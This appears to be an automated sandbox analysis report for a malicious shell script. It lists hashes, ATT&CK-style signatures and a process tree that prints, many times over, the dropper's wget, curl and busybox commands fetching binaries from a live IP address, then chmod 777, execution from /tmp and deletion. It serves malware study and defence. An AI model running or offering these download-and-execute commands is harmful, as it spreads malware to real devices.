Analysis
-
max time kernel
69s -
max time network
71s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
-
Size
10KB
-
MD5
a16f2f2454e5b18f780fd0e5f5db5230
-
SHA1
f8c9a2379edf5ce246d41383617f895ef5840d7c
-
SHA256
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3
-
SHA512
79ee2c5eb57fb5281133280b36b26033038ef2ee4641bba5561500c47537cc2b656a2e7810a2879954bb95b143811d44dd0c01eee312b69c3267042254d35f92
-
SSDEEP
192:lVkP23rABx8p/2aJMkxUAQtiZEYq3rABxu2aJMkxkAQtiZEL:lVkP23rABx8p/2aJMkxbBq3rABxu2aJW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh1⤵PID:739
-
/bin/rm/bin/rm bins.sh2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:767
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:774
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:790
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:818
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:837
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:855
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:879
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:885
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:891
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:900
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:906
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:912
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:918
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:924
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:930
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:936
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:942
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:948
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:954
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:960
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:966
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:972
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:978
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:984
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:990
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:996
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:999
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:1000
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:1002
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:1005
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:1006
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:1008
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97